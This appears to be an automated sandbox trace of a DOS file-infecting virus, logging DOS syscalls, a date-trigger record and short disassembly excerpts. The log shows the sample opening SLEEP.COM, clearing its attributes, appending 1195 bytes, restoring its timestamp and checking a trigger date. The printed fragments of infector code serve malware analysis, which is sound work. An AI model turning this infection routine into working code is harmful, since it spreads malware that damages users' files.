2018-12-25T11:48:42.13092304Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:42.13866447Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:42.141931597Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:42.144745056Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:42.154183858Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:42.158064543Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:42.166346495Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:42.177061611Z 79 PC: 12c0c | Find next file (See above)
2018-12-25T11:48:42.179888599Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:42.186278058Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:42.193511622Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:42.19570769Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:42.212567363Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:42.215495665Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:42.222319818Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:42.22535778Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:42.228810484Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:42.231747452Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:42.234647769Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:42.244390321Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:42.24620482Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:42.253816764Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:42.264617043Z 42 PC: 12b53 | Get date 0x12b53: cmp dx, 0x606
0x12b57: je 0x12b5c
0x12b59: jmp 0x12da2
0x12b5c: jmp 0x12d37
0x12b5f: and ah, bh
0x12b61: movsw word ptr es:[di], word ptr [si]
0x12b62: mov ax, 0x5c4c
0x12b65: add word ptr [di], ax
0x12b67: add byte ptr [di - 0x75], dl
0x12b6a: in al, dx
0x12b6b: sub sp, 0x2c
0x12b6e: push si
0x12b6f: jmp 0x12be0
0x12b71: mov ah, 0x1a
0x12b73: lea dx, word ptr [bp - 0x2c]
0x12b76: int 0x21
0x12b78: mov ah, 0x4e
0x12b7a: mov cx, 0x10
0x12b7d: mov dx, 0x1a2
0x12b80: add dx, word ptr [0x106]
2018-12-25T11:48:42.267219471Z 59 PC: 12dad | Change current directory
2018-12-25T11:48:42.271393601Z 59 PC: 12db4 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":3146,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:48:42.282773585Z 71 PC: 12b2d | Get current directory
2018-12-25T11:48:42.286547828Z 59 PC: 12b38 | Change current directory
2018-12-25T11:48:42.29103603Z 26 PC: 12beb | Set disk transfer address
2018-12-25T11:48:42.292252785Z 78 PC: 12bf9 | Find first file
2018-12-25T11:48:42.311477283Z 61 PC: 12c24 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:42.320475517Z 63 PC: 12c36 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T11:48:42.327657923Z 44 PC: 12c9e | Get time 0x12c9e: add dl, dh
0x12ca0: je 0x12c9a
0x12ca2: mov si, 0x115
0x12ca5: add si, word ptr [0x106]
0x12ca9: mov byte ptr [si], dl
0x12cab: mov ax, 0x4301
0x12cae: xor cx, cx
0x12cb0: mov dx, si
0x12cb2: add dx, 0xb4
0x12cb6: int 0x21
0x12cb8: mov ah, 0x3e
0x12cba: int 0x21
0x12cbc: mov ax, 0x3d02
0x12cbf: int 0x21
0x12cc1: jb 0x12c45
0x12cc3: mov di, dx
0x12cc5: add di, 0x5d
0x12cc8: stosw word ptr es:[di], ax
0x12cc9: xchg ax, bx
0x12cca: mov ah, 0x40
2018-12-25T11:48:42.330050977Z 67 PC: 12cb8 | Get or set file attributes
2018-12-25T11:48:43.480525507Z 62 PC: 12cbc | Close file
2018-12-25T11:48:43.48247729Z 61 PC: 12cc1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:43.489884769Z 64 PC: 12cd4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:48:43.493213303Z 64 PC: 12ce6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:43.49593481Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:43.498658926Z 66 PC: 12d04 | Move file pointer
2018-12-25T11:48:43.501003016Z 64 PC: 12a82 | Write file or device (Write 1195 bytes on handle 5)
2018-12-25T11:48:43.640955461Z 87 PC: 12d1d | Get or set file date and time
2018-12-25T11:48:43.647799552Z 62 PC: 12d21 | Close file
2018-12-25T11:48:43.661648085Z 67 PC: 12d32 | Get or set file attributes
2018-12-25T11:48:43.676579907Z 79 PC: 12c0c | Find next file
2018-12-25T11:48:43.679874744Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:43.689893937Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:43.698071399Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:43.700736866Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:43.728240534Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:43.730730231Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:43.738748644Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:43.741729158Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:43.74487962Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:43.747689776Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:43.749984992Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:43.780526444Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:43.78213002Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:43.82110345Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:43.848271805Z 79 PC: 12c0c | Find next file (See above)
2018-12-25T11:48:43.851174927Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:43.859385866Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:43.868978845Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:43.872333938Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:43.897609988Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:43.899814059Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:43.907494838Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:43.911253699Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:43.914034789Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:43.917189042Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:43.919281857Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:43.942600541Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:43.945216936Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:43.990138191Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:44.031384992Z 42 PC: 12b53 | Get date 0x12b53: cmp dx, 0x606
0x12b57: je 0x12b5c
0x12b59: jmp 0x12da2
0x12b5c: jmp 0x12d37
0x12b5f: and ah, bh
0x12b61: movsw word ptr es:[di], word ptr [si]
0x12b62: mov ax, 0x5c4c
0x12b65: add word ptr [di], ax
0x12b67: add byte ptr [di - 0x75], dl
0x12b6a: in al, dx
0x12b6b: sub sp, 0x2c
0x12b6e: push si
0x12b6f: jmp 0x12be0
0x12b71: mov ah, 0x1a
0x12b73: lea dx, word ptr [bp - 0x2c]
0x12b76: int 0x21
0x12b78: mov ah, 0x4e
0x12b7a: mov cx, 0x10
0x12b7d: mov dx, 0x1a2
0x12b80: add dx, word ptr [0x106]
2018-12-25T11:48:44.035135719Z 59 PC: 12dad | Change current directory
2018-12-25T11:48:44.038357186Z 59 PC: 12db4 | Change current directory